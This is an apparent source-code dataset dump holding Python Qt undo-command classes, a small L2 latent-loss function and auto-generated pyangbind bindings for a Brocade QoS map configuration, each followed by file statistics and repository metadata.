class CommandRemoveTemplate(QtGui.QUndoCommand):
    """Undoable command that removes an existing template from a model."""

    def __init__(self, model, row, parent):
        super(CommandRemoveTemplate, self).__init__('Removed a template')
        self.model, self.row, self.parent = model, row, parent
        # Capture the template up front so undo can restore the same instance.
        self.template = model.templates[row]

    def undo(self):
        """Re-insert the removed template and re-attach its name signal."""
        mdl = self.model
        mdl.beginInsertRows(self.parent, self.row, self.row)
        mdl.templates.insert(self.row, self.template)
        self.template.nameChanged.connect(mdl._templateNameChanged)
        mdl.endInsertRows()

    def redo(self):
        """Remove the template at the stored row and detach its name signal."""
        mdl = self.model
        mdl.beginRemoveRows(self.parent, self.row, self.row)
        mdl.templates.pop(self.row)
        self.template.nameChanged.disconnect(mdl._templateNameChanged)
        mdl.endRemoveRows()
class CommandAddEvent(QtGui.QUndoCommand):
    """Undoable command that inserts a freshly created event into a model."""

    def __init__(self, model, row, parent):
        super(CommandAddEvent, self).__init__('Added a new event')
        self.model, self.row, self.parent = model, row, parent
        # Create the event once so redo/undo always handle the same object.
        self.event = model.new_event()

    def redo(self):
        """Insert the event at the stored row and hook up its change signal."""
        mdl = self.model
        mdl.beginInsertRows(self.parent, self.row, self.row)
        mdl.events.insert(self.row, self.event)
        self.event.changed.connect(mdl._eventChanged)
        mdl.endInsertRows()

    def undo(self):
        """Take the event back out and detach its change signal."""
        mdl = self.model
        mdl.beginRemoveRows(self.parent, self.row, self.row)
        mdl.events.pop(self.row)
        self.event.changed.disconnect(mdl._eventChanged)
        mdl.endRemoveRows()
class CommandRemoveEvent(QtGui.QUndoCommand):
    """Undoable command that removes an existing event from a model.

    The event object is captured at construction so undo can restore the
    exact instance (and its signal connection) that redo removed.
    """

    def __init__(self, model, row, parent):
        super(CommandRemoveEvent, self).__init__('Removed a event')
        self.model = model
        self.row = row
        self.parent = parent
        # FIX: was `model.objects(row)`, which does not match the list that
        # redo/undo operate on (self.model.events); mirror the sibling
        # CommandRemoveTemplate, which captures `model.templates[row]`.
        # With the old form, undo would re-insert (and connect) an object
        # other than the one redo popped from model.events.
        self.event = model.events[row]

    def undo(self):
        """Re-insert the removed event and re-attach its change signal."""
        self.model.beginInsertRows(self.parent, self.row, self.row)
        self.model.events.insert(self.row, self.event)
        self.event.changed.connect(self.model._eventChanged)
        self.model.endInsertRows()

    def redo(self):
        """Remove the event at the stored row and detach its change signal."""
        self.model.beginRemoveRows(self.parent, self.row, self.row)
        self.model.events.pop(self.row)
        self.event.changed.disconnect(self.model._eventChanged)
        self.model.endRemoveRows()
| 36.011494
| 77
| 0.677944
| 365
| 3,133
| 5.693151
| 0.117808
| 0.173244
| 0.127045
| 0.065448
| 0.875842
| 0.85948
| 0.85948
| 0.85948
| 0.85948
| 0.769009
| 0
| 0.000403
| 0.207469
| 3,133
| 87
| 78
| 36.011494
| 0.836488
| 0
| 0
| 0.8
| 0
| 0
| 0.026165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.014286
| 0
| 0.242857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a13a093341e5366e2db3c0f54ff6020f738abda
| 91
|
py
|
Python
|
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | 1
|
2022-02-18T17:09:25.000Z
|
2022-02-18T17:09:25.000Z
|
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | null | null | null |
models/loss.py
|
APikielny/mannequinchallenge
|
686ec20d86210005f1481a2f7c179ccba48636c5
|
[
"Apache-2.0"
] | null | null | null |
import torch
def L2(latent_1, latent_2):
    """Mean squared error (L2 loss) between two latent tensors.

    Args:
        latent_1: first tensor.
        latent_2: second tensor, broadcast-compatible with ``latent_1``.

    Returns:
        Scalar tensor: mean of the squared element-wise difference.
    """
    diff = latent_1 - latent_2
    return (diff * diff).mean()
| 22.75
| 49
| 0.703297
| 16
| 91
| 3.75
| 0.5625
| 0.233333
| 0.433333
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 0.164835
| 91
| 4
| 49
| 22.75
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
4a21ad754bfcacfcac9876c1293c359869191fb9
| 38,085
|
py
|
Python
|
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/qos/map_/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import cos_mutation
import cos_traffic_class
import traffic_class_cos
import dscp_mutation
import dscp_traffic_class
import dscp_cos
class map_(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-qos-mls - based on the path /qos/map. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__cos_mutation','__cos_traffic_class','__traffic_class_cos','__dscp_mutation','__dscp_traffic_class','__dscp_cos',)
_yang_name = 'map'
_rest_name = 'map'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
    # Auto-generated (pyangbind) container constructor: resolves the path
    # helper and extmethods (explicit kwarg wins, else inherited from the
    # parent node), builds the six YANG list members, then optionally copies
    # attributes from a single supplied source object.

    # Resolve the XPath helper: False disables it; a YANGPathHelper instance
    # is used directly; otherwise fall back to the parent's helper if any.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
        self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
        self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
        path_helper_ = getattr(self._parent, "_path_helper", False)
        self._path_helper = path_helper_
    else:
        self._path_helper = False
    # Resolve extension methods the same way (dict of per-path callbacks).
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
        self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
        self._extmethods = extmethods
    elif hasattr(self, "_parent"):
        extmethods = getattr(self._parent, "_extmethods", None)
        self._extmethods = extmethods
    else:
        self._extmethods = False
    # Auto-generated YANG list containers (one per QoS map type).  Each is a
    # YANGDynClass-wrapped YANGListType carrying the CLI extension metadata
    # from the brocade-qos-mls module.  Do not hand-edit these lines.
    self.__cos_mutation = YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    self.__traffic_class_cos = YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    self.__dscp_mutation = YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    self.__dscp_traffic_class = YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    self.__cos_traffic_class = YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    self.__dscp_cos = YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    # Optional copy-construction: a single source object must expose every
    # pyangbind element; changed elements are copied via their setters.
    load = kwargs.pop("load", None)
    if args:
        if len(args) > 1:
            raise TypeError("cannot create a YANG container with >1 argument")
        all_attr = True
        for e in self._pyangbind_elements:
            if not hasattr(args[0], e):
                all_attr = False
                break
        if not all_attr:
            raise ValueError("Supplied object did not have the correct attributes")
        for e in self._pyangbind_elements:
            nobj = getattr(args[0], e)
            # Skip elements the source never modified.
            if nobj._changed() is False:
                continue
            setmethod = getattr(self, "_set_%s" % e)
            if load is None:
                setmethod(getattr(args[0], e))
            else:
                setmethod(getattr(args[0], e), load=load)
def _path(self):
    """Return the YANG path of this container as a list of node names.

    Root-relative default is [u'qos', u'map']; otherwise the parent's path
    is extended with this node's yang name.
    """
    if not hasattr(self, "_parent"):
        return [u'qos', u'map']
    return self._parent._path() + [self._yang_name]
def _rest_path(self):
    """Return the REST URI path of this container as a list of segments.

    Falls back to the static [u'qos', u'map'] location when the node has no
    parent; nodes without a rest name contribute no segment of their own.
    """
    if not hasattr(self, "_parent"):
        return [u'qos', u'map']
    if self._rest_name:
        return self._parent._rest_path() + [self._rest_name]
    return self._parent._rest_path()
def _get_cos_mutation(self):
    """
    Getter method for cos_mutation, mapped from YANG variable /qos/map/cos_mutation (list)
    """
    # Double-underscore attribute is name-mangled to _map___cos_mutation;
    # it is populated with a YANGDynClass list container in __init__.
    return self.__cos_mutation
def _set_cos_mutation(self, v, load=False):
    """
    Setter method for cos_mutation, mapped from YANG variable /qos/map/cos_mutation (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_cos_mutation is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_cos_mutation() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
        t = YANGDynClass(v,base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """cos_mutation must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__cos_mutation = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_cos_mutation(self):
    # Reset cos_mutation to a fresh, empty generated list instance built with
    # the same schema arguments as the default.
    self.__cos_mutation = YANGDynClass(base=YANGListType("name",cos_mutation.cos_mutation, yang_name="cos-mutation", rest_name="cos-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}), is_container='list', yang_name="cos-mutation", rest_name="cos-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-Mutation map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_mutation', u'cli-mode-name': u'cos-mutation-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_cos_traffic_class(self):
    """Return the cos_traffic_class list, mapped from YANG /qos/map/cos_traffic_class (list)."""
    value = self.__cos_traffic_class
    return value
def _set_cos_traffic_class(self, v, load=False):
    """
    Setter method for cos_traffic_class, mapped from YANG variable /qos/map/cos_traffic_class (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_cos_traffic_class is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_cos_traffic_class() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
        t = YANGDynClass(v,base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """cos_traffic_class must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__cos_traffic_class = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_cos_traffic_class(self):
    # Reset cos_traffic_class to a fresh, empty generated list instance built
    # with the same schema arguments as the default.
    self.__cos_traffic_class = YANGDynClass(base=YANGListType("name",cos_traffic_class.cos_traffic_class, yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}), is_container='list', yang_name="cos-traffic-class", rest_name="cos-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure CoS-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'cos_traffic_class', u'cli-mode-name': u'cos-traffic-class-$(name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_traffic_class_cos(self):
    """Return the traffic_class_cos list, mapped from YANG /qos/map/traffic_class_cos (list)."""
    value = self.__traffic_class_cos
    return value
def _set_traffic_class_cos(self, v, load=False):
    """
    Setter method for traffic_class_cos, mapped from YANG variable /qos/map/traffic_class_cos (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_traffic_class_cos is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_traffic_class_cos() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
        t = YANGDynClass(v,base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """traffic_class_cos must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__traffic_class_cos = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_traffic_class_cos(self):
    # Reset traffic_class_cos to a fresh, empty generated list instance built
    # with the same schema arguments as the default.
    self.__traffic_class_cos = YANGDynClass(base=YANGListType("traffic_class_cos_map_name",traffic_class_cos.traffic_class_cos, yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='traffic-class-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}), is_container='list', yang_name="traffic-class-cos", rest_name="traffic-class-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Traffic-Class-to-CoS map', u'cli-no-key-completion': None, u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'traffic_class_cos', u'cli-mode-name': u'traffic-class-cos-$(traffic-class-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_mutation(self):
    """Return the dscp_mutation list, mapped from YANG /qos/map/dscp_mutation (list)."""
    value = self.__dscp_mutation
    return value
def _set_dscp_mutation(self, v, load=False):
    """
    Setter method for dscp_mutation, mapped from YANG variable /qos/map/dscp_mutation (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_dscp_mutation is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_dscp_mutation() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
